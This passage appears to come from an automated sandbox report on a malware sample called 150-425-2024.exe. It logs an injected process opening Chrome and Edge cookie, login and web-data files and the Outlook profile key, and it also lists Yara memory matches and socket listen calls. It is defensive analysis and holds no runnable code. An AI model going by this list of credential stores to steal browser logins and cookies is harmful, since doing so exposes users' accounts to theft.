Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: 150-425-2024.exe Binary or memory string: WIN_81
Source: 150-425-2024.exe Binary or memory string: WIN_XP
Source: 150-425-2024.exe Binary or memory string: WIN_XPe
Source: 150-425-2024.exe Binary or memory string: WIN_VISTA
Source: 150-425-2024.exe Binary or memory string: WIN_7
Source: 150-425-2024.exe Binary or memory string: WIN_8
Source: 150-425-2024.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00C36596
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00C36A5A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs